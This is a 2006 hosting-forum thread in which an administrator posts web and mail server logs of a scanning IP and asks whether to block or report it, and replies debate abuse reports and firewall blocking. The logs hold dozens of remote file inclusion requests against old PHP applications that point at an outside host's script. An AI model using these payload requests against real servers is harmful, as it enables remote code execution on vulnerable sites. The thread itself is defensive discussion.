Should i report IPs that behave suspciously? and if so, how?

T

tarquel

Verified User
Joined
Nov 6, 2006
Messages
69
Location
Mid-Wales, UK
Hi all

I've been looking at my logs and I've noticed a certain IP trying all sorts of things...

as far as I know, the inividual is not getting anywhere.

Here's some excerpt's from the logs:

2006-11-23 07:50:39 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "MAIL FROM: <[email protected]>" H=mail.cablevision.at [217.16.115.7] next input="RCPT TO: <[email protected]>\r\n"
2006-11-23 07:50:39 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "MAIL FROM: <[email protected]>" H=mail.cablevision.at [217.16.115.7] next input="RCPT TO: <[email protected]>\r\n"
Click to expand...

I assume this one the person is trying to direct emails from paypal to his address....

[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/init.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/phpdig/includes/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/modules/My_eGallery/public/displayCategory.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/gallery/init.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/nuke/modules/My_eGallery/public/displayCategory.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/My_eGallery/public/displayCategory.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/oneadmin/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/oneadmin/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html//gallery/init.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/phpdig/includes/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/ezupload/index.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/oneadmin/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/nuke/modules/My_eGallery/public/displayCategory.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/ezupload/index.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/ezupload/index.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/index.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html//gallery/init.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/index.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/index.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/init.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/http://217.91.89.145/http://69.20.42.178/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/http://217.91.89.145/http://69.20.42.178/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/http://217.91.89.145/http://69.20.42.178/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/gallery/init.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/config.php
[Thu Nov 23 23:17:01 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/oneadmin/config.php
[Thu Nov 23 23:17:03 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/gallery/init.php
[Thu Nov 23 23:17:03 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/config.php
[Thu Nov 23 23:17:03 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/oneadmin/config.php
[Thu Nov 23 23:17:03 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/ezupload/index.php
[Thu Nov 23 23:17:04 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/index.php
[Thu Nov 23 23:17:04 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/http://217.91.89.145/http://69.20.42.178/config.php
[Thu Nov 23 23:17:04 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/ezupload/index.php
[Thu Nov 23 23:17:04 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/index.php
[Thu Nov 23 23:17:04 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/http://217.91.89.145/http://69.20.42.178/config.php
Click to expand...

There's a lot more on this one - has been trying alot.

217.16.115.7 - - [23/Nov/2006:23:16:58 +0000] "GET /gallery/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:58 +0000] "GET /config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /services/support/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /gallery/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /search/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /services/support/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /search/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /buscar/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /phpDig/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /buscar/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /My_eGallery/public/displayCategory.php?adminpath=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /phpDig/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /phpdig/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /nuke/modules/My_eGallery/public/displayCategory.php?adminpath=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /My_eGallery/public/displayCategory.php?adminpath=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET //gallery/init.php?HTTP_POST_VARS=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /phpdig/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /nuke/modules/My_eGallery/public/displayCategory.php?adminpath=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET //gallery/init.php?HTTP_POST_VARS=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /init.php?HTTP_POST_VARS=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /gallery/init.php?HTTP_POST_VARS=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:01 +0000] "GET /oneadmin/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:03 +0000] "GET /gallery/init.php?HTTP_POST_VARS=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:03 +0000] "GET /config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:03 +0000] "GET /oneadmin/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:03 +0000] "GET /ezupload/index.php?path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:04 +0000] "GET /index.php?path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:04 +0000] "GET /http://217.91.89.145/http://69.20.42.178/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:04 +0000] "GET /ezupload/index.php?path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:04 +0000] "GET /index.php?path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:04 +0000] "GET /http://217.91.89.145/http://69.20.42.178/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Click to expand...

[lol win98 - he better look at his/her own security lmao]

Should I just block the IP from any sort of access of the server? [if so, how? - as i havent done it before] or should i report the IP with these sections of the logs to someone?

If so, is there a procedure someone can point me to?

Cheers
Nath.
 
Honestly you will probably get nowhere but you can look up the owner of the ip address on www.dnsstuff.com (using the IP whois) and report your logs to their abuse email address.

99% of the time you will get no response and will have no idea if the ISP/data center did anything about it.

Best idea is to ban them with your firewall and report if you have the time.

Regarding your logs odds are that is a compromised zombie machine with malware on it trying to attack other hosts.
 
if the mail are rejected, it's a bad idea to block ip with firewall

this is a server, then you will find lot of funny thing in log
don't worry, just be up to date with your server & firewall
 
xemaps,

You continue to post questionable opinions as fact.

Why is it a bad idea to block badly behaving servers at the firewall level by IP#?

Jeff
 
Jeff,

Imagine you have a lot of ip blocked by firewall, this take some ressources and more as you don't block and just reject mail because it's malformed.
If you reject, the mail return to sender and mostly follows retry rules depends of messages (or have to, rfc rules)
If you block by firewall, no message, noone knows what happen's, and you can of course being blacklisted.
Then the retry (of course!) from sender can take ressources by trying send mail again and again, this act like small DDOS attack.
Multiply that by the number of ip blocked in firewall.
And i'm not sure it's rfc compliant to block ips just why you received one bad email. You can have on a same ip good mail sender AND bad mail sender with different server names (virtual hosts...)

Sure i tryed both solution ! You can see the server load.
Firewall is just for extreme special cases.

This is my mind, but not only mine...
 
Thanks for the reply. You make some good points.

As far as machine load is concerned, blocking at the firewall (kernel) level uses the least machine resources.

We don't block at the firewall level after only one mail. But we certainly block problematic IP#s.

Jeff
 
You must log in or register to reply here.
Back
Top